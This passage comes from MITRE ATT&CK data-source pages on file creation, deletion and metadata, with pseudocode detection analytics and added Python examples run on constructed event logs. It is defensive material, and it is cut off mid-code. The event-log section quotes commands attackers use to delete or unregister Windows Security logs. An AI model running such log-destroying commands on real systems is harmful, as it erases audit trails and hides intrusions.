* $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1

.014 Emond

Monitor emond rules creation by checking for files created in /etc/emond.d/rules/ and /private/var/db/emondClients.

.016 Installer Packages

Monitor creation of files associated with installer packages that may be abused for malicious execution.

Enterprise T1187 Forced Authentication

Monitor for newly constructed .LNK, .SCF, or any other files on systems and within virtual environments that contain resources pointing to external network resources.

Enterprise T1564 Hide Artifacts

Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection.

.001 Hidden Files and Directories

Monitor the file system and shell commands for files being created with a leading ".".

.006 Run Virtual Instance

Monitor for newly constructed files associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V).

.009 Resource Forking

Monitor for newly constructed files that may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.

Enterprise T1574 Hijack Execution Flow

Monitor for newly constructed files that may execute their own malicious payloads by hijacking the way operating systems run programs.

.001 DLL Search Order Hijacking

Monitor newly constructed .manifest and .local redirection files that do not correlate with software updates.

.002 DLL Side-Loading

Monitor for newly constructed files in common folders on the computer system.

.004 Dylib Hijacking

Monitor for newly constructed dylibs.

.005 Executable Installer File Permissions Weakness

Monitor for newly constructed files that match the name of an existing service executable; such creations can be detected and correlated with other suspicious behavior.

.006 Dynamic Linker Hijacking

Monitor for newly constructed files that are added to absolute paths of shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.

.007 Path Interception by PATH Environment Variable

Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also, monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.

.008 Path Interception by Search Order Hijacking

Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also, monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.

.009 Path Interception by Unquoted Path

Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also, monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.

.010 Services File Permissions Weakness

Monitor for creation of binaries and service executables that do not occur during a regular software update or an update scheduled by the organization. This behavior also considers files that are overwritten.

Enterprise T1105 Ingress Tool Transfer

Monitor for file creation and files transferred into the network.

Enterprise T1570 Lateral Tool Transfer

Monitor for newly constructed files transferred to or from a system as part of a lateral tool transfer.

ICS T0867 Lateral Tool Transfer

Monitor for file creation in conjunction with other techniques (e.g., file transfers using Remote Services).

Enterprise T1036 .007 Masquerading: Double File Extension

Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.

Enterprise T1556 Modify Authentication Process

Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.[14]

Monitor for newly created files that may be used to register malicious network provider dynamic link libraries (DLLs).

.002 Password Filter DLL

Monitor for newly constructed files that may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.

.008 Network Provider DLL

Monitor for newly created files that may be used to register malicious network provider dynamic link libraries (DLLs).

Enterprise T1027 Obfuscated Files or Information

Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).

.004 Compile After Delivery

Monitor for newly constructed files for payloads.

.006 HTML Smuggling

Monitor for newly constructed files written via JavaScript, though developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging. Consider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.

.009 Embedded Payloads

Monitor for newly constructed files containing large amounts of data. Abnormal file sizes may be an indicator of embedded content.

.012 LNK Icon Smuggling

Monitor for downloaded malicious files, though developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging. Consider monitoring files downloaded from the Internet, possibly by LNK Icon Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.

Enterprise T1137 Office Application Startup

Monitor for newly constructed files that may leverage Microsoft Office-based applications for persistence between startups.

.001 Office Template Macros

Monitor for newly constructed files that may abuse Microsoft Office templates to obtain persistence on a compromised system.

.002 Office Test

Monitor for newly constructed files that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.

.006 Add-ins

Monitor for newly constructed files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.

Enterprise T1003 .002 OS Credential Dumping: Security Account Manager

Monitor newly constructed files being written with default names that have extracted credentials from the Security Account Manager.

Enterprise T1566 Phishing

Monitor for newly constructed files from phishing messages used to gain access to victim systems.

.001 Spearphishing Attachment

Monitor for newly constructed files from spearphishing emails with a malicious attachment sent in an attempt to gain access to victim systems.

Enterprise T1091 Replication Through Removable Media

Monitor for newly constructed files on removable media.

ICS T0847 Replication Through Removable Media

Monitor for newly constructed files copied to or from removable media.

Enterprise T1496 Resource Hijacking

Monitor for common cryptomining or proxyware files on local systems that may indicate compromise and resource usage.

Enterprise T1053 Scheduled Task/Job

Monitor newly constructed files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.

.005 Scheduled Task

Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows Task Scheduler to schedule a command to be run at a specified time, date, and even host. Task Scheduler stores tasks as files in two locations - C:\Windows\Tasks (legacy) or C:\Windows\System32\Tasks. Accordingly, this analytic looks for the creation of task files in these two locations.

Analytic 1 - Scheduled Task - File Creation

task_files = filter files where ( (file_path = "C:\Windows\System32\Tasks*" or file_path = "C:\Windows\Tasks*") and image_path != "C:\WINDOWS\system32\svchost.exe")

.007 Container Orchestration Job

Monitor for newly constructed files by using the logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments.

Enterprise T1505 Server Software Component

Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.

.002 Transport Agent

Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.

.003 Web Shell

File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.[15]

.004 IIS Components

Monitor for creation of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules.

ICS T0865 Spearphishing Attachment

Monitor for newly constructed files from spearphishing emails with a malicious attachment sent in an attempt to gain access to victim systems.

Enterprise T1553 .005 Subvert Trust Controls: Mark-of-the-Web Bypass

Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.

Enterprise T1218 System Binary Proxy Execution

Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.

.001 Compiled HTML File

Monitor presence and use of CHM files, especially if they are not typically used within an environment.

.002 Control Panel

Monitor for newly constructed files that may forge web cookies that can be used to gain access to web applications or Internet services.

.005 Mshta

Monitor use of HTA files. If they are not typically used within an environment, then execution of them may be suspicious.

.014 MMC

Monitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity.

Enterprise T1080 Taint Shared Content

Monitor for newly constructed files on network shares; processes that write or overwrite many files in a network shared directory may be suspicious.

Enterprise T1204 User Execution

Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

.001 Malicious Link

Monitor for malicious documents and files that are downloaded from a link and executed on the user's computer.

.002 Malicious File

Monitor for newly constructed files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\Windows\System32 directory tree. There will be only occasional false positives due to administrator actions.

For Windows, Sysmon Event ID 11 (File create) can be used to track file creation events. This event also provides the Process ID of the process that created the file, which can be correlated with process creation events (e.g., Sysmon Event ID 1) to determine if the file was downloaded from an external network.

For macOS, utilities that work in concert with Apple's Endpoint Security Framework such as File Monitor can be used to track file creation events.

Analytic 1 : Batch File Write to System32

batch_files = filter files where ( extension =".bat" AND file_path = "C:\Windows\system32*" )
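The two file-creation analytics on this page (the Scheduled Task file-creation filter above under T1053.005 and the batch-file-in-System32 filter just above) are given as pseudocode. What follows is an added Python illustration, not MITRE's or CAR's own code, that runs both over a handful of constructed Sysmon Event ID 11 style records; the field names file_path and image_path follow the pseudocode rather than Sysmon's own field names, and every sample path is constructed.

```python
"""Added example: the two file-creation analytics on this page (Scheduled Task
file creation and batch files written to System32) applied to constructed
Sysmon Event ID 11 style records. Not MITRE or CAR code."""
from fnmatch import fnmatch

# Constructed sample records. The field names (file_path, image_path) follow
# the pseudocode on this page rather than Sysmon's own TargetFilename/Image.
SAMPLE_EVENTS = [
    {"file_path": r"C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag",
     "image_path": r"C:\WINDOWS\system32\svchost.exe"},              # Task Scheduler itself
    {"file_path": r"C:\Windows\System32\Tasks\Updater",
     "image_path": r"C:\Users\alice\AppData\Local\Temp\setup.exe"},  # unexpected writer
    {"file_path": r"C:\Windows\Tasks\At1.job",
     "image_path": r"C:\Windows\System32\cmd.exe"},                  # legacy task store
    {"file_path": r"C:\Windows\System32\drivers\etc\hosts",
     "image_path": r"C:\Windows\System32\notepad.exe"},
    {"file_path": r"C:\Windows\System32\run.bat",
     "image_path": r"C:\Windows\System32\cmd.exe"},                  # batch file in System32
    {"file_path": r"C:\Users\alice\Desktop\backup.bat",
     "image_path": r"C:\Program Files\Notepad++\notepad++.exe"},
]

TASK_STORES = (r"C:\Windows\System32\Tasks*", r"C:\Windows\Tasks*")
TASK_SCHEDULER_HOST = r"C:\WINDOWS\system32\svchost.exe"


def _glob(path, pattern):
    # Windows paths are case-insensitive, so compare both sides lower-cased.
    return fnmatch(path.lower(), pattern.lower())


def scheduled_task_files(events):
    """Analytic 1 (Scheduled Task): task files written by anything other than
    the svchost.exe instance hosting the Task Scheduler service."""
    return [e for e in events
            if any(_glob(e["file_path"], p) for p in TASK_STORES)
            and e["image_path"].lower() != TASK_SCHEDULER_HOST.lower()]


def batch_files_in_system32(events):
    """Analytic 1 (Malicious File): .bat files created anywhere under System32."""
    return [e for e in events
            if e["file_path"].lower().endswith(".bat")
            and _glob(e["file_path"], r"C:\Windows\system32*")]


if __name__ == "__main__":
    for hit in scheduled_task_files(SAMPLE_EVENTS):
        print("task file by unexpected writer:", hit["file_path"], "<-", hit["image_path"])
    for hit in batch_files_in_system32(SAMPLE_EVENTS):
        print("batch file in System32:", hit["file_path"], "<-", hit["image_path"])
```

Both filters are deliberately broad, as the page's pseudocode is; in practice the svchost.exe exclusion should be tightened to the specific service instance, and the batch-file rule tuned against known administration and patch activity.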

File: File Deletion

Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)

Domain ID Name Detects
Enterprise T1554 Compromise Client Software Binary

Monitor for unexpected deletion of client software binaries to establish persistent access to systems.

Enterprise T1485 Data Destruction

Monitor for unexpected deletion of a file (ex: Sysmon EID 23).

ICS T0809 Data Destruction

Monitor for unexpected deletion of files.

Enterprise T1565 Data Manipulation

Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity.

.001 Stored Data Manipulation

Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity.

.003 Runtime Data Manipulation

Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity.

Enterprise T1562 Impair Defenses

Monitor for missing log files from hosts and services with known active periods.

.012 Disable or Modify Linux Audit System

Monitor for missing log files from machines with known active periods.

Enterprise T1070 Indicator Removal

Monitor for a file that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

.001 Clear Windows Event Logs

Monitor for unexpected deletion of Windows event logs (via native binaries); this may also generate an alertable event (Event ID 1102: "The audit log was cleared"). When an event log is cleared, a new event is created that alerts that the event log was cleared. For Security logs, it is event codes 1100 and 1102. For System logs, it is event code 104.

It is unlikely that event log data would be cleared during normal operations, and it is likely that malicious attackers may try to cover their tracks by clearing an event log. When an event log gets cleared, it is suspicious.

  1. This is often done using wevtutil, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.

  2. Alerting when a Clear Event Log is generated could point to this intruder technique. Centrally collecting events has the added benefit of making it much harder for attackers to cover their tracks. Event Forwarding permits sources to forward multiple copies of a collected event to multiple collectors, thus enabling redundant event collection. Using a redundant event collection model can minimize the single point of failure risk.

  3. Attackers may set the option of the sources of events with Limit-EventLog -LogName Security -OverflowAction DoNotOverwrite so that old EventLog entries are not deleted when the .evtx is full. By default the Security Log size is configured with the minimum value of 20,480 KB (~23,000 EventLog entries). So if this option is enabled, all new EventLog entries will be automatically discarded. We can detect this behavior with Security EventLog 1104.

  4. Attackers may delete .evtx files with del C:\Windows\System32\winevt\logs\Security.evtx or Remove-Item C:\Windows\System32\winevt\logs\Security.evtx after having disabled and stopped the EventLog service. As the EventLog service is disabled and stopped, the .evtx files are no longer in use by the service and can be deleted. The new EventLog will be unavailable until the configuration is reset.

  5. Attackers may use the PowerShell command Remove-EventLog -LogName Security to unregister sources of events that are part of Windows (Application, Security, ...). This command deletes the Security EventLog (which also generates Event ID 1102), but new EventLog entries are still recorded until the system is rebooted. After the system is rebooted, the Security log is unregistered and does not record any new entries. However, logs generated between the command and the reboot are still available in the .evtx file.

Analytic 1 - User Activity from Clearing Event Logs

cleared_logs = filter log_files where ((log_name = "Security") AND (event_id = "1100" OR event_id ="1102" OR event_id = "1104")) OR (log_name = "System" AND event_code = "104")

.002 Clear Linux or Mac System Logs

Monitor for unexpected deletion of a system log file, typically stored in /var/logs or /Library/Logs.

.003 Clear Command History

Monitor for unexpected deletion of a command history file, such as ConsoleHost_history.txt, ~/.zsh_history, or ~/.bash_history.

Analytic 1 : Deletion of command history files

suspicious_files = filter ProcessGuid, ProcessFilePath, UserName, FilePath where (event_id == "23" AND FilePath LIKE '%ConsoleHost_history.txt%') OR (event_id == "4663" AND FilePath LIKE '%ConsoleHost_history.txt%' AND ObjectType == "File" AND (UserAccessList LIKE '%1537%' OR UserAccessList LIKE '%DELETE%'))
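The two Indicator Removal analytics above, event log clearing under .001 and deletion of command history files under .003, are written as pseudocode filters. The block below is an added Python illustration, not MITRE's or CAR's code, that runs both over constructed Windows event records; field names follow the pseudocode (log_name, event_id, FilePath, UserAccessList) rather than the raw event XML, the user names and process GUIDs are constructed, and %%1537 is the Windows message-table token for the DELETE access right as the .003 pseudocode uses it.

```python
"""Added example: the two Indicator Removal analytics on this page, event
log clearing (.001) and deletion of command history files (.003), applied
to constructed Windows event records. Not MITRE or CAR code."""

# Constructed records. Field names follow the pseudocode on this page
# (log_name, event_id, FilePath, UserAccessList), not the raw event XML.
PS_HISTORY = r"C:\Users\{u}\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
SAMPLE_EVENTS = [
    {"log_name": "Security", "event_id": 4624, "UserName": "alice"},
    {"log_name": "Security", "event_id": 1102, "UserName": "alice"},     # audit log cleared
    {"log_name": "Security", "event_id": 1100, "UserName": "SYSTEM"},    # event log service shut down
    {"log_name": "System", "event_id": 104, "UserName": "bob"},          # System log cleared
    {"log_name": "System", "event_id": 7036, "UserName": "SYSTEM"},
    {"log_name": "Security", "event_id": 1104, "UserName": "SYSTEM"},    # security log is full
    {"log_name": "Application", "event_id": 1102, "UserName": "carol"},  # wrong channel, ignored
    # Sysmon EID 23 (FileDelete) of a PowerShell history file
    {"log_name": "Sysmon", "event_id": 23, "UserName": "bob", "ProcessGuid": "{0001}",
     "ProcessFilePath": r"C:\Windows\System32\cmd.exe", "FilePath": PS_HISTORY.format(u="bob")},
    # Security EID 4663: requested access on the history file includes DELETE (%%1537)
    {"log_name": "Security", "event_id": 4663, "UserName": "carol", "ProcessGuid": "{0002}",
     "ProcessFilePath": r"C:\Windows\explorer.exe", "FilePath": PS_HISTORY.format(u="carol"),
     "ObjectType": "File", "UserAccessList": "%%1537"},
    # Security EID 4663: a plain read of the same file, must not match
    {"log_name": "Security", "event_id": 4663, "UserName": "carol", "ProcessGuid": "{0003}",
     "ProcessFilePath": r"C:\Windows\System32\notepad.exe", "FilePath": PS_HISTORY.format(u="carol"),
     "ObjectType": "File", "UserAccessList": "%%4416"},
]

# Channel -> event IDs meaning the log was cleared, its service stopped, or it filled up
CLEAR_SIGNATURES = {"Security": {1100, 1102, 1104}, "System": {104}}

HISTORY_FILES = ("consolehost_history.txt", ".bash_history", ".zsh_history")


def cleared_log_events(events):
    """Analytic 1 (.001): events indicating a Security or System log was cleared."""
    return [e for e in events
            if e["event_id"] in CLEAR_SIGNATURES.get(e["log_name"], ())]


def _is_history_file(path):
    return path.replace("\\", "/").lower().endswith(HISTORY_FILES)


def history_file_deletions(events):
    """Analytic 1 (.003): Sysmon EID 23 deletions of a history file, or Security
    EID 4663 where the requested access on a history file includes DELETE."""
    hits = []
    for e in events:
        if not _is_history_file(e.get("FilePath", "")):
            continue
        access = e.get("UserAccessList", "")
        if e["event_id"] == 23 or (
                e["event_id"] == 4663 and e.get("ObjectType") == "File"
                and ("%%1537" in access or "DELETE" in access.upper())):
            hits.append({k: e[k] for k in ("ProcessGuid", "ProcessFilePath", "UserName", "FilePath")})
    return hits


if __name__ == "__main__":
    for e in cleared_log_events(SAMPLE_EVENTS):
        print("log cleared/stopped:", e["log_name"], e["event_id"], "by", e["UserName"])
    for h in history_file_deletions(SAMPLE_EVENTS):
        print("history file deletion:", h["UserName"], h["ProcessFilePath"], h["FilePath"])
```

Event 1100 is also written at every orderly shutdown of the event log service, so it stays in the result as the page's pseudocode has it but should be correlated with a shutdown before it is escalated. The .003 filter matches on the file name only, so the Linux and macOS history files named in the text are covered by the same helper.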

.004 File Deletion

Monitor for unexpected deletion of files from the system

.008 Clear Mailbox Data

Monitor for deletion of generated artifacts on a host system, including logs or captured files such as quarantined emails.

On Windows 10, mail application data is stored in C:\Users\Username\AppData\Local\Comms\Unistore\data. On Linux, mail data is stored in /var/spool/mail or /var/mail. On macOS, mail data is stored in ~/Library/Mail.

.009 Clear Persistence

Monitor for a file that may delete or alter generated artifacts associated with persistence on a host system.

ICS T0872 Indicator Removal on Host

Monitor for a file that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

Enterprise T1490 Inhibit System Recovery

The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.

File: File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

Domain ID Name Detects
Enterprise T1548 Abuse Elevation Control Mechanism

Monitor the file system for files that have the setuid or setgid bits set. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).

.001 Setuid and Setgid

Monitor the file system for files that have the setuid or setgid bits set.
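A concrete form of the monitoring described above is a periodic scan for set-id files compared against a saved baseline, so that a newly appearing setuid or setgid binary stands out. The block below is an added Python example, not MITRE's code; it walks a directory tree with os.lstat (symlinks are not followed), reports mode strings, and includes a constructed demo that builds a scratch tree with one setuid file to show the output.

```python
"""Added example: scan a directory tree for files carrying the setuid or
setgid bit and diff the result against a saved baseline, so that a
newly appearing set-id binary stands out. Not MITRE code."""
import os
import stat
import tempfile


def find_setid_files(root):
    """Map path -> ls-style mode string for every regular file under root
    whose mode has S_ISUID or S_ISGID set. Symlinks are not followed."""
    hits = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # vanished or unreadable entry: skip it
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits[path] = stat.filemode(st.st_mode)
    return hits


def new_setid_files(current, baseline):
    """Paths present in the current scan but absent from the baseline;
    these are the ones worth investigating."""
    return sorted(p for p in current if p not in baseline)


def demo_in_tempdir():
    """Constructed demo tree: one plain script and one setuid script.
    Returns (scan_result, path_of_the_setuid_file)."""
    root = tempfile.mkdtemp(prefix="setid_demo_")
    plain = os.path.join(root, "plain.sh")
    marked = os.path.join(root, "bin", "helper")
    os.makedirs(os.path.dirname(marked))
    for path in (plain, marked):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho hi\n")
    os.chmod(plain, 0o755)
    os.chmod(marked, 0o4755)   # setuid bit plus rwxr-xr-x
    return find_setid_files(root), marked


if __name__ == "__main__":
    found, _ = demo_in_tempdir()
    for path, mode in sorted(found.items()):
        print(mode, path)
```

On a real host the baseline is the scan taken after a known-good build; running find_setid_files over / and feeding both results to new_setid_files gives the delta to review, and a scheduled run of the same scan turns it into the monitoring the text calls for.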

Enterprise T1554 Compromise Client Software Binary

Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment.

Enterprise T1543 .003 Create or Modify System Process: Windows Service

Adversaries may modify the binary file for an existing service to achieve Persistence while potentially also achieving Defense Evasion. If a newly created or modified binary runs as a service, it may indicate APT activity. However, services are frequently installed by legitimate software, so a well-tuned baseline is essential to differentiating between benign and malicious service modifications. Look for events where a file was created and then later run as a service; in these cases, a new service has been created or the binary has been modified. Many programs, such as msiexec.exe, perform these actions legitimately and can be used to help validate legitimate service creations/modifications.

Analytic 1 - Service Binary Modifications

legitimate_installers = ["C:\windows\system32\msiexec.exe", "C:\windows\syswow64\msiexec.exe", ...]

file_change = search File:Create,Modify
process = search Process:Create
service_process = filter processes where (parent_exe == "services.exe")
modified_service = join (search, filter) where ( file_change.time < service_process.time and file_change.file_path == service_process.image_path)

modified_service = filter modified_service where (modified_service.file_change.image_path not in legitimate_installers)
output modified_service
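The join in the analytic above is the interesting part: a file write, followed later by a process start of that same image whose parent is services.exe, with writes by known installers dropped. The block below is an added Python illustration of that join, not MITRE's or CAR's code; the records, timestamps and writer paths are constructed, the "..." in the page's installer list is left as only the two named msiexec.exe paths, and the 24-hour join window is an assumption added here since the pseudocode only orders the two timestamps.

```python
"""Added example: the Service Binary Modifications analytic above, joining
file create/modify events to later process starts parented by services.exe
and dropping writes made by known installers. Not MITRE or CAR code."""
from datetime import datetime, timedelta

# Writers the page treats as legitimate; the "..." in the pseudocode stands
# for a site-specific list, so only the two named there are included.
LEGITIMATE_INSTALLERS = {
    r"c:\windows\system32\msiexec.exe",
    r"c:\windows\syswow64\msiexec.exe",
}

T0 = datetime(2024, 1, 1, 12, 0, 0)   # constructed base timestamp

# Constructed File:Create/Modify records: who wrote which file, and when.
FILE_CHANGES = [
    {"time": T0, "file_path": r"C:\Program Files\Vendor\svc.exe",
     "image_path": r"C:\Windows\System32\msiexec.exe"},              # installer, expected
    {"time": T0 + timedelta(minutes=5), "file_path": r"C:\Windows\Temp\helper.exe",
     "image_path": r"C:\Users\alice\Downloads\dropper.exe"},         # unexpected writer
    {"time": T0 + timedelta(minutes=30), "file_path": r"C:\Windows\System32\oldsvc.exe",
     "image_path": r"C:\Users\alice\Downloads\dropper.exe"},         # written after the start below
]

# Constructed Process:Create records: image, parent, and start time.
PROCESSES = [
    {"time": T0 + timedelta(minutes=1), "image_path": r"C:\Program Files\Vendor\svc.exe",
     "parent_exe": "services.exe"},
    {"time": T0 + timedelta(minutes=6), "image_path": r"C:\Windows\Temp\helper.exe",
     "parent_exe": "services.exe"},
    {"time": T0 + timedelta(minutes=7), "image_path": r"C:\Windows\Temp\helper.exe",
     "parent_exe": "explorer.exe"},                                  # not a service start
    {"time": T0 - timedelta(minutes=10), "image_path": r"C:\Windows\System32\oldsvc.exe",
     "parent_exe": "services.exe"},                                  # started before the write
]


def modified_services(file_changes, processes,
                      legitimate=LEGITIMATE_INSTALLERS, window=timedelta(hours=24)):
    """Join each file change to service starts of the same image that follow it.
    The join window is an assumption added here; the pseudocode only orders
    the two timestamps."""
    service_starts = [p for p in processes if p["parent_exe"].lower() == "services.exe"]
    hits = []
    for fc in file_changes:
        if fc["image_path"].lower() in legitimate:
            continue                                   # known installer wrote it
        for sp in service_starts:
            if (fc["file_path"].lower() == sp["image_path"].lower()
                    and fc["time"] < sp["time"] <= fc["time"] + window):
                hits.append({"file_path": fc["file_path"], "writer": fc["image_path"],
                             "written": fc["time"], "service_start": sp["time"]})
    return hits


if __name__ == "__main__":
    for hit in modified_services(FILE_CHANGES, PROCESSES):
        print(hit["file_path"], "written by", hit["writer"], "then started as a service")
```

Of the three constructed writes only helper.exe survives: svc.exe was written by an allow-listed installer, and oldsvc.exe was written after the service start rather than before it, which is exactly the ordering the pseudocode's time comparison enforces.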

Enterprise T1565 Data Manipulation

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc., that would aid in the manipulation of data to hide activity.

.003 Runtime Data Manipulation

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc., that would aid in the manipulation of data to hide activity.

Enterprise T1546 Event Triggered Execution

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

.006 LC_LOAD_DYLIB Addition

Changes to binaries that do not line up with application updates or patches are also extremely suspicious.

Enterprise T1222 File and Directory Permissions Modification

Monitor and investigate attempts to modify ACLs and file/directory ownership.

.001 Windows File and Directory Permissions Modification

Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.

Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions.

Windows environment logs can be noisy, so we take the following into consideration:

  • We need to exclude events generated by the local system (subject security ID "NT AUTHORITY\SYSTEM") and focus on actual user events.
  • When a permission modification is made for a folder, a new event log is generated for each subfolder and file under that folder. It is advised to group logs based on handle ID or user ID.
  • The Windows security log (event ID 4670) also includes information about the process that modifies the file permissions. It is advised to focus on uncommon process names, and it is also uncommon for real users to perform this task without a GUI.
  • Pseudocode Event ID is for Windows Security Log (Event ID 4670 - Permissions on an object were changed).
  • Windows Event ID 4719 (An Attempt Was Made to Access An Object) can also be used to alert on changes to Active Directory audit policy for a system.

Linux environment logs can be more noisy than the Windows-specific implementation, although Linux does not generate logs for system triggered activities like in Windows. In addition, it may be necessary to whitelist cron jobs that regularly run and execute chmod.

Analytic 1 : Access Permission Modification for Windows

file_dacl_events = filter log_events where (event_id == "4670" AND object_type == "File" AND subject_security_id != "NT AUTHORITY\SYSTEM")

Analytic 2 - Access Permission Modification for Linux

chmod_processes = filter processes where command_line == "chmod *"
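The two analytics above, together with the noise-reduction points listed before them (exclude the local system account, group one folder change's per-child events by handle ID, watch the modifying process), can be expressed directly. The block below is an added Python illustration, not MITRE's or CAR's code: it filters constructed Security EID 4670 records, groups them per (user, HandleId) so a recursive icacls run collapses to one entry, and applies the chmod filter to constructed Linux process records. The SIDs, user names and paths are constructed; the SYSTEM exclusion is done on the well-known SID S-1-5-18 rather than the display name the pseudocode uses.

```python
"""Added example: the two permission-modification analytics above, Windows
Security EID 4670 with the SYSTEM account excluded and events grouped per
handle, and chmod invocations on Linux, over constructed records.
Not MITRE or CAR code."""
from collections import defaultdict

LOCAL_SYSTEM_SID = "S-1-5-18"   # well-known SID behind NT AUTHORITY\SYSTEM

# Constructed Security events. A recursive icacls run on one folder yields one
# 4670 per child object, all sharing the same HandleId.
SAMPLE_WIN_EVENTS = [
    {"event_id": 4670, "ObjectType": "File", "SubjectUserSid": LOCAL_SYSTEM_SID,
     "SubjectUserName": "SYSTEM", "HandleId": "0x1c4", "ObjectName": r"C:\Windows\Temp\svc.log",
     "ProcessName": r"C:\Windows\System32\svchost.exe"},
    {"event_id": 4670, "ObjectType": "File", "SubjectUserSid": "S-1-5-21-1111-2222-3333-1001",
     "SubjectUserName": "alice", "HandleId": "0x2a8", "ObjectName": r"C:\ProgramData\App",
     "ProcessName": r"C:\Windows\System32\icacls.exe"},
    {"event_id": 4670, "ObjectType": "File", "SubjectUserSid": "S-1-5-21-1111-2222-3333-1001",
     "SubjectUserName": "alice", "HandleId": "0x2a8", "ObjectName": r"C:\ProgramData\App\app.exe",
     "ProcessName": r"C:\Windows\System32\icacls.exe"},
    {"event_id": 4670, "ObjectType": "File", "SubjectUserSid": "S-1-5-21-1111-2222-3333-1001",
     "SubjectUserName": "alice", "HandleId": "0x2a8", "ObjectName": r"C:\ProgramData\App\config.ini",
     "ProcessName": r"C:\Windows\System32\icacls.exe"},
    {"event_id": 4670, "ObjectType": "File", "SubjectUserSid": "S-1-5-21-1111-2222-3333-1002",
     "SubjectUserName": "bob", "HandleId": "0x3f0", "ObjectName": r"C:\Users\bob\notes.txt",
     "ProcessName": r"C:\Windows\explorer.exe"},
    {"event_id": 4670, "ObjectType": "Key", "SubjectUserSid": "S-1-5-21-1111-2222-3333-1001",
     "SubjectUserName": "alice", "HandleId": "0x410", "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\App",
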